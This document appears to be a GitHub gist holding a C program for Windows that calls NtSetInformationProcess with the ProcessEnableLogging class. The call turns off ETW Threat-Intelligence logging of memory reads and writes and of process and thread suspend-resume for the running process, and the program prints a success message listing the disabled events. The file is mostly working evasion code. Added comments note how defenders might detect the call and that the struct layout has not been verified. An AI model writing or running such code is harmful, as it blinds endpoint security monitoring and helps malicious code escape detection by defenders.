@iilegacyyii
Created February 26, 2024 10:40
#include <windows.h>
#include <stdio.h>
#pragma region [typedefs]
/*
 * Information classes accepted by NtQueryInformationProcess /
 * NtSetInformationProcess.  Values are the native (undocumented) ordinals;
 * only ProcessEnableLogging (0x60) is used by main() in this file.
 */
typedef enum _PROCESSINFORMATIONCLASS
{
    /* 0x00 - 0x0f */
    ProcessBasicInformation                     = 0x0,
    ProcessQuotaLimits                          = 0x1,
    ProcessIoCounters                           = 0x2,
    ProcessVmCounters                           = 0x3,
    ProcessTimes                                = 0x4,
    ProcessBasePriority                         = 0x5,
    ProcessRaisePriority                        = 0x6,
    ProcessDebugPort                            = 0x7,
    ProcessExceptionPort                        = 0x8,
    ProcessAccessToken                          = 0x9,
    ProcessLdtInformation                       = 0xa,
    ProcessLdtSize                              = 0xb,
    ProcessDefaultHardErrorMode                 = 0xc,
    ProcessIoPortHandlers                       = 0xd,
    ProcessPooledUsageAndLimits                 = 0xe,
    ProcessWorkingSetWatch                      = 0xf,

    /* 0x10 - 0x1f */
    ProcessUserModeIOPL                         = 0x10,
    ProcessEnableAlignmentFaultFixup            = 0x11,
    ProcessPriorityClass                        = 0x12,
    ProcessWx86Information                      = 0x13,
    ProcessHandleCount                          = 0x14,
    ProcessAffinityMask                         = 0x15,
    ProcessPriorityBoost                        = 0x16,
    ProcessDeviceMap                            = 0x17,
    ProcessSessionInformation                   = 0x18,
    ProcessForegroundInformation                = 0x19,
    ProcessWow64Information                     = 0x1a,
    ProcessImageFileName                        = 0x1b,
    ProcessLUIDDeviceMapsEnabled                = 0x1c,
    ProcessBreakOnTermination                   = 0x1d,
    ProcessDebugObjectHandle                    = 0x1e,
    ProcessDebugFlags                           = 0x1f,

    /* 0x20 - 0x2f */
    ProcessHandleTracing                        = 0x20,
    ProcessIoPriority                           = 0x21,
    ProcessExecuteFlags                         = 0x22,
    ProcessResourceManagement                   = 0x23,
    ProcessCookie                               = 0x24,
    ProcessImageInformation                     = 0x25,
    ProcessCycleTime                            = 0x26,
    ProcessPagePriority                         = 0x27,
    ProcessInstrumentationCallback              = 0x28,
    ProcessThreadStackAllocation                = 0x29,
    ProcessWorkingSetWatchEx                    = 0x2a,
    ProcessImageFileNameWin32                   = 0x2b,
    ProcessImageFileMapping                     = 0x2c,
    ProcessAffinityUpdateMode                   = 0x2d,
    ProcessMemoryAllocationMode                 = 0x2e,
    ProcessGroupInformation                     = 0x2f,

    /* 0x30 - 0x3f */
    ProcessTokenVirtualizationEnabled           = 0x30,
    ProcessConsoleHostProcess                   = 0x31,
    ProcessWindowInformation                    = 0x32,
    ProcessHandleInformation                    = 0x33,
    ProcessMitigationPolicy                     = 0x34,
    ProcessDynamicFunctionTableInformation      = 0x35,
    ProcessHandleCheckingMode                   = 0x36,
    ProcessKeepAliveCount                       = 0x37,
    ProcessRevokeFileHandles                    = 0x38,
    ProcessWorkingSetControl                    = 0x39,
    ProcessHandleTable                          = 0x3a,
    ProcessCheckStackExtentsMode                = 0x3b,
    ProcessCommandLineInformation               = 0x3c,
    ProcessProtectionInformation                = 0x3d,
    ProcessMemoryExhaustion                     = 0x3e,
    ProcessFaultInformation                     = 0x3f,

    /* 0x40 - 0x4f */
    ProcessTelemetryIdInformation               = 0x40,
    ProcessCommitReleaseInformation             = 0x41,
    ProcessDefaultCpuSetsInformation            = 0x42,
    ProcessAllowedCpuSetsInformation            = 0x43,
    ProcessSubsystemProcess                     = 0x44,
    ProcessJobMemoryInformation                 = 0x45,
    ProcessInPrivate                            = 0x46,
    ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
    ProcessIumChallengeResponse                 = 0x48,
    ProcessChildProcessInformation              = 0x49,
    ProcessHighGraphicsPriorityInformation      = 0x4a,
    ProcessSubsystemInformation                 = 0x4b,
    ProcessEnergyValues                         = 0x4c,
    ProcessActivityThrottleState                = 0x4d,
    ProcessActivityThrottlePolicy               = 0x4e,
    ProcessWin32kSyscallFilterInformation       = 0x4f,

    /* 0x50 - 0x5f */
    ProcessDisableSystemAllowedCpuSets          = 0x50,
    ProcessWakeInformation                      = 0x51,
    ProcessEnergyTrackingState                  = 0x52,
    ProcessManageWritesToExecutableMemory       = 0x53,
    ProcessCaptureTrustletLiveDump              = 0x54,
    ProcessTelemetryCoverage                    = 0x55,
    ProcessEnclaveInformation                   = 0x56,
    ProcessEnableReadWriteVmLogging             = 0x57,   /* PROCESS_READWRITEVM_LOGGING_INFORMATION */
    ProcessUptimeInformation                    = 0x58,
    ProcessImageSection                         = 0x59,
    ProcessDebugAuthInformation                 = 0x5a,
    ProcessSystemResourceManagement             = 0x5b,
    ProcessSequenceNumber                       = 0x5c,
    ProcessLoaderDetour                         = 0x5d,
    ProcessSecurityDomainInformation            = 0x5e,
    ProcessCombineSecurityDomainsInformation    = 0x5f,

    /* 0x60 - 0x64 */
    ProcessEnableLogging                        = 0x60,   /* PROCESS_LOGGING_INFORMATION; used by main() */
    ProcessLeapSecondInformation                = 0x61,
    ProcessFiberShadowStackAllocation           = 0x62,
    ProcessFreeFiberShadowStackAllocation       = 0x63,
    MaxProcessInfoClass                         = 0x64    /* one past the last valid class */
} PROCESSINFORMATIONCLASS;
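/*
 * Buffer passed to NtSetInformationProcess(ProcessEnableLogging) by main().
 *
 * Layout is kept exactly as the original declared it: six ULONG members.
 * Flags is set to 0xf by main() alongside the four Enable* members -
 * presumably a mask of which settings are being written; confirm against
 * the kernel definition before relying on it.
 *
 * Fix: the original line `ULONG Reserved = 26;` is a C++ default member
 * initializer and does not compile as C.  main() assigns Reserved = 26
 * itself, so dropping the initializer changes neither layout nor the
 * value sent.  NOTE(review): the 26 reads like it was meant as a
 * bit-width (compare the commented-out 1-bit members below); the layout
 * is left as written and has not been validated against the kernel here.
 */
typedef struct _PROCESS_LOGGING_INFORMATION
{
    ULONG Flags;
    ULONG EnableReadVmLogging;
    ULONG EnableWriteVmLogging;
    ULONG EnableProcessSuspendResumeLogging;
    ULONG EnableThreadSuspendResumeLogging;
    //ULONG EnableLocalExecProtectVmLogging : 1; // New in Win11
    //ULONG EnableRemoteExecProtectVmLogging : 1; // New in Win11
    ULONG Reserved;                             // set by the caller (main() writes 26)
} PROCESS_LOGGING_INFORMATION, * PPROCESS_LOGGING_INFORMATION;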
/*
 * Buffer shape for the ProcessEnableReadWriteVmLogging (0x57) class: one
 * byte viewed either as a whole (Flags) or as two 1-bit settings plus
 * 6 unused bits.  Declared here but not referenced by main() in this file.
 */
typedef union _PROCESS_READWRITEVM_LOGGING_INFORMATION
{
UCHAR Flags; // whole-byte view of the bit-fields below
struct
{
UCHAR EnableReadVmLogging : 1;
UCHAR EnableWriteVmLogging : 1;
UCHAR Unused : 6;
};
} PROCESS_READWRITEVM_LOGGING_INFORMATION, * PPROCESS_READWRITEVM_LOGGING_INFORMATION;
/*
 * Signature of ntdll!NtSetInformationProcess, resolved at run time via
 * GetProcAddress in main() (it is not exported through the Win32 import
 * libraries).  ProcessInformationClass takes a PROCESSINFORMATIONCLASS value
 * cast to ULONG; ProcessInformation/ProcessInformationLength describe the
 * class-specific buffer.  Returns an NTSTATUS (0 == STATUS_SUCCESS).
 */
typedef NTSTATUS(NTAPI* typeNtSetInformationProcess)(HANDLE ProcessHandle, ULONG ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength);
#pragma endregion
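/*
 * Clears the per-process logging flags of the current process through the
 * native NtSetInformationProcess(ProcessEnableLogging) call and reports the
 * NTSTATUS it returns.  The success message names the four ETW
 * Threat-Intelligence event groups whose flags are cleared.
 *
 * Defender's note: this is a telemetry-suppression action scoped to the
 * calling process only (the pseudo-handle for the current process is
 * passed).  Sensors that consume those ETW-Ti events lose visibility into
 * this process afterwards; the call itself - NtSetInformationProcess with
 * information class 0x60 issued from user mode - is the observable worth
 * covering in detection logic.  NOTE(review): whether the kernel accepts the
 * six-ULONG PROCESS_LOGGING_INFORMATION declared in this file cannot be
 * verified here; "success" below means only that Status == 0 came back.
 *
 * argc/argv/envp are accepted for signature compatibility but unused.
 * Returns 0 on STATUS_SUCCESS, 1 if ntdll or the export cannot be resolved
 * or the call fails.
 */
int main(int argc, char** argv, char** envp)
{
    (void)argc;
    (void)argv;
    (void)envp;

    // ntdll is mapped into every process, but check anyway rather than pass
    // NULL on to GetProcAddress.
    HMODULE Ntdll = GetModuleHandleA("ntdll.dll");
    if (Ntdll == NULL)
    {
        printf("[!] GetModuleHandleA(ntdll.dll) failed, error %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    // Original called through this pointer unconditionally; a missing export
    // would have been a NULL-function-pointer crash instead of a message.
    typeNtSetInformationProcess NtSetInformationProcess =
        (typeNtSetInformationProcess)GetProcAddress(Ntdll, "NtSetInformationProcess");
    if (NtSetInformationProcess == NULL)
    {
        printf("[!] GetProcAddress(NtSetInformationProcess) failed, error %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    // Prepare for NtSetInformationProcess: Flags = 0xf with every Enable*
    // member cleared.  Reserved = 26 is carried over from the original
    // (its meaning is not established by this file).
    PROCESS_LOGGING_INFORMATION ProcessLoggingInformation = { 0 };
    ProcessLoggingInformation.Flags = (ULONG)0xf;
    ProcessLoggingInformation.EnableReadVmLogging = 0;
    ProcessLoggingInformation.EnableWriteVmLogging = 0;
    ProcessLoggingInformation.EnableProcessSuspendResumeLogging = 0;
    ProcessLoggingInformation.EnableThreadSuspendResumeLogging = 0;
    ProcessLoggingInformation.Reserved = 26;

    NTSTATUS Status = NtSetInformationProcess(
        GetCurrentProcess(),                  // pseudo-handle (HANDLE)-1 to the current process
        (ULONG)ProcessEnableLogging,
        &ProcessLoggingInformation,
        // Original wrote sizeof(_PROCESS_LOGGING_INFORMATION): a bare struct
        // tag is only accepted by C++; sizeof the object is the same value
        // and valid in both languages.
        (ULONG)sizeof ProcessLoggingInformation);

    if (Status == 0)
    {
        printf("[+] Successfully disabled the following ETW-Ti events\n"
               " - ReadVmLogging\n"
               " - WriteVmLogging\n"
               " - ProcessSuspendResumeLogging\n"
               " - ThreadSuspendResumeLogging\n");
        return 0;
    }

    // NTSTATUS is a signed 32-bit LONG; print it through an unsigned long so
    // the format specifier matches the argument type.
    printf("[!] Error, status 0x%08lX\n", (unsigned long)Status);
    return 1;
}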